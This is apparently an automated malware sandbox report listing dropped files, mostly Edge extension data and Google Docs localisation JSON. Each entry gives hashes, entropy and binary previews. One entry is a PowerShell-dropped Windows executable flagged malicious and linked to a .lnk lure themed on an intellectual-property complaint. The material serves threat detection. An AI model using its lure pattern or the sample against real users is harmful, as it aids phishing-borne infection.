                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 135363
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):76326
                                                                                                                                                                                                      Entropy (8bit):7.9961120748813075
                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                      SSDEEP:1536:hS5Vvm808scZeEzFrSpzBUl4MZIGM/iysAGz8vBBrYunau6wp:GdS8scZNzFrMa4M+lKqeu/nr
                                                                                                                                                                                                      MD5:01E352D35675990A139199DD86B38AAC
                                                                                                                                                                                                      SHA1:E16163C81E5F36B3B819AA0A63BFA63D88548A91
                                                                                                                                                                                                      SHA-256:148CDE42D38C62C1A1E8B8D3D4BD8830F0F8C2DC684E3C59B0A510E31011CA4A
                                                                                                                                                                                                      SHA-512:75A58FFAD6E3E0546268CC863AE382B5429795D8BCED64BAE2D06BCEEB6C2E37BD656A3E335EB61B521888B76913F2D0281F8C9C081FF8637307AE5934D98C8B
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:...........m{..(.}...7.\...N.D*.w..m..q....%XfL.*I.ql..;/.....s...E...0....`..A..[o^.^Y...F_.'.*.."L...^.......Y..W..l...E0..YY...:.&.u?....J..U<.q."...p.ib:.g.*.^.q.mr.....^&.{.E.....,EAp.q.......=.=.....z^.,d.^..J.R..zI4..2b?.-D5/.^...+.G..Y..?5..k........i.,.T#........_DV....P..d2......b\..L....o....Z.}../....CU.$.-..D9`..~......=....._.2O..?....b.{...7IY.L..q....K....T..5m.d.s.4.^... ..~<..7~6OS..b...^>.......s..n....k."..G.....L...z.U...... ... .ZY...,...kU1..N...(..V.r\$..s...X.It...x.mr..W....g........9DQR....*d......;L.S.....G... .._D.{.=.zI.g.Y~...`T..p.yO..4......8$..v.J..I.%..._.d.[..du5._._...?\..8.c.....U...fy.t....q.t....T@.......:zu..\,.!.I..AN_.....FeX..h.c.i.W.......(.....Y..F...R%.\..@.. 2(e,&.76..F+...l.t.$..`...........Wi.{.U.&(.b}...}.i..,...k....!..%...&.c..D-."..SQ.......q9....)j....7.".N....AX...).d./giR....uk.....s.....^...........:...~......(hP..K.@.&..?.E0:+D|9...U.q.cu..)t{.e...X...{.....z......LL&I6.=.
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1420
                                                                                                                                                                                                      Entropy (8bit):5.4122345002562575
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:YK0bl5r75riCe0qW+5Ua02EHP5IKL0jZ5JwbX/B+L0rOD3V5SOD3iz0rODsDM5M:YK0bl5r75riN0qW+5Ua02sP5IKL0jZ5Z
                                                                                                                                                                                                      MD5:FC8D4B08D5D87398A6EA94C8150CC8FE
                                                                                                                                                                                                      SHA1:7BC7A11221E6962284141CFF19E5540148470510
                                                                                                                                                                                                      SHA-256:CB6206ADC48CB68F5991706E164C149F18FC71DE1F536F71828217EBCB6255A4
                                                                                                                                                                                                      SHA-512:80DFA53DE36AEC1E256D0888377715EAF642006DFE3B06DFE2E9B221EE606FACBE26607DFF48E85AFD9E71A405F00FEA7159D14615CC372AC2F5C51B76601ADD
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{"logTime": "1005/074019", "correlationVector":"Jzai6BfByv5amZ45/NBe5r","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/074027", "correlationVector":"eO8FwRQNRwFtIUhPNa0yBN","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/074027", "correlationVector":"DFCC0B139A2547CAA3433B33892C7FE6","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/075031", "correlationVector":"bWXPYvVSVVANvrGBV6dHxn","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/075032", "correlationVector":"4CD8E3A1D096444AAB77DA6A690C4356","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/075123", "correlationVector":"t3DmiSvoNTibe+/mLDIMfl","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/075124", "correlationVector":"B2B504519464422FA5C6E610072CF270","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/075313", "correlationVector":"/q9eTq3f/ZawbQrLDVWKju","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/075314", "correlationVector":"138D0C7D
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:Google Chrome extension, version 3
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):138356
                                                                                                                                                                                                      Entropy (8bit):7.809609231921042
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3072:AQ++ZdS5+fnwcxO+XwquyeNnmraugZ/1DOoncWD/5q:AQ++/PZmlyeNnh/1SmRq
                                                                                                                                                                                                      MD5:3F6F93C3DCCD4A91C4EB25C7F6FEB1C1
                                                                                                                                                                                                      SHA1:9B73F46ADFA1F4464929B408407E73D4535C6827
                                                                                                                                                                                                      SHA-256:19F05352CB4C6E231C1C000B6C8B7E9EDCC1E8082CAF46FFF16B239D32AA7C9E
                                                                                                                                                                                                      SHA-512:D488FA67E3A29D0147E9EAF2EABC74D9A255F8470CF79A4AEA60E3B3B5E48A3FCBC4FC3E9CE58DFF8D7D0CAA8AE749295F221E1FE1BA5D20DEB2D97544A12BA4
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........q.a.....E..i.t,..7C..7!...`l.-.......T.vH...~.....'..aH..C.oJOE..d..2..$J......I..;.(9l.(..+.N.6.@...].a.n.S.6..=.b.W.\....o...#.~J.W.1..E...2H....S.g0....../.H...y.O8...kE.,..m!..F.D.p......H..s.W ...#.L........Ij.........-..n..\..vD.d.V.....!......[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. ?Eq.M...[6^...+.].G..Y]...7..o.. U...v....P.J...@.E!...B.d..p..i".%............oo.<....~=..!t.+...`....h..LK....0....h...,.R%.....u...._..V_.q:_._..5}.uS\.....x?...~]..C-....S=L...._c.P.B....-M...62.i*.Q.....9.....+S=...../6:...W..ql/g..&j.y..{.."....|..F....|....V....w.%t.y..?..&..a..<.n....S+|..=.ra.....
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:Google Chrome extension, version 3
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):11185
                                                                                                                                                                                                      Entropy (8bit):7.951995436832936
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                      MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                      SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                      SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                      SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G
                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):2764800
                                                                                                                                                                                                      Entropy (8bit):7.070336860381345
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:49152:/VHFXSzmqiDqCbm1gickVsPT1uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuTuuuuC:/VHFXSzmqsegfkVsBuuuuuuuuuuuuuu5
                                                                                                                                                                                                      MD5:1C0B92098975DC116DE9C0595D347882
                                                                                                                                                                                                      SHA1:BD22E2B44DB0CFFD0AEADBD023318A7ED9E4D8BC
                                                                                                                                                                                                      SHA-256:D0F631F6269C14FE7622F4A1085F99E6BFD235942CE57715914EE4A319484A55
                                                                                                                                                                                                      SHA-512:699897751BA6D3FDAD4C808FF05E7C886328DADA9903A737AEF51155F0D074FE373FF85F63AFA5D55639DE4BB6AD30E8041C27F8F7FAE05A19192956C9C0F45B
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                                                      • Filename: Documenti relativi alla violazione dei diritti di propriet#U00e0 intellettuale.lnk, Detection: malicious, Browse
                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................z..............z........#.............................Rich..................PE..L......C.....................`....................@...........................6.....Y.$..............................................."..............................................................................................................text............................... ..`.rdata...|..........................@..@.data....)...P.......P..............@....rsrc........."......0..............@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      File Type:PDF document, version 1.7
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):656088
                                                                                                                                                                                                      Entropy (8bit):7.994208869820549
                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                      SSDEEP:12288:r/TWRciaGbqp+t4v1TxPDt75QhxfR4/xFSnhfCsP10+:jTgc3Iq+0hxLt75Q6ZFShf/Pm+
                                                                                                                                                                                                      MD5:19E87DB70542A9FA556C1412E35FC300
                                                                                                                                                                                                      SHA1:B74FE6AB84969B938BF76E2A780546CFC727EAFB
                                                                                                                                                                                                      SHA-256:CF41E7881EC4A232F462EF0FC0E15C409619D18B3A8A84B49768268505AF80E3
                                                                                                                                                                                                      SHA-512:3983D20EF020BCAED0A3269CAE844B35BFCC99558820697517D4C9BDBD886D425A3236D08DB9194E816F0AACE2E6DDEFF0F95A693B4ED7FC3B91EBA018CEF440
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:%PDF-1.7.%.....18 0 obj.<<./Length 293./N 3./Filter /FlateDecode.>>.stream.x.}..J......(.....28.h..iRpi"..V..S..A.OHS..tspu+....c(....#....AR.x.......@.....?..F..[V[..G@`*...dK..$...O.K..o...@...6..`.O.,f'..O. .a.sx.0A..6..vf...8....{c7..%op..Z.:u.....Q.......0Q.F.....*....(.S....DGACAa..j.g.rx....]..s...PxM.......c...vhO.<..v....-X}...b3~...*....mDJH.T~...K..endstream.endobj.19 0 obj.<<./Type /XObject./Subtype /Image./Width 2400./Height 1363./ColorSpace /DeviceRGB./BitsPerComponent 8./ColorTransform 0./Filter [/FlateDecode /DCTDecode]./DecodeParms [null <<./Quality 45.>>]./Length 11488.>>.stream.x..}}p..y.}. ....:..4nA'`........I..e.....T].).E.!....&u..9.&k.0-.]A.......m...V.Lf.FP..!.4M..Q.......M......gw...=H....x.....o...........x&qj......F.3.}...O......}.?.......}.....~lq.-,}.g?....K......>......\_.....I..f.x.........G.....w....\:~9.|.".h2.h..7..5.Hf.._B.K.....G...:A>..D*.N......y........Sg.g....=..+..~.+.~...............N.wtl|..O..O......CO........B.r...|..
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):4982
                                                                                                                                                                                                      Entropy (8bit):7.929761711048726
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                      MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                      SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                      SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                      SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):908
                                                                                                                                                                                                      Entropy (8bit):4.512512697156616
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                      MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                      SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                      SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                      SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1285
                                                                                                                                                                                                      Entropy (8bit):4.702209356847184
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                      MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                      SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                      SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                      SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1244
                                                                                                                                                                                                      Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                      MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                      SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                      SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                      SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):977
                                                                                                                                                                                                      Entropy (8bit):4.867640976960053
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                      MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                      SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                      SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                      SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):3107
                                                                                                                                                                                                      Entropy (8bit):3.535189746470889
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                      MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                      SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                      SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                      SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1389
                                                                                                                                                                                                      Entropy (8bit):4.561317517930672
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                      MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                      SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                      SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                      SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1763
                                                                                                                                                                                                      Entropy (8bit):4.25392954144533
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                                                      MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                                                      SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                                                      SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                                                      SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):930
                                                                                                                                                                                                      Entropy (8bit):4.569672473374877
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                                                      MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                                                      SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
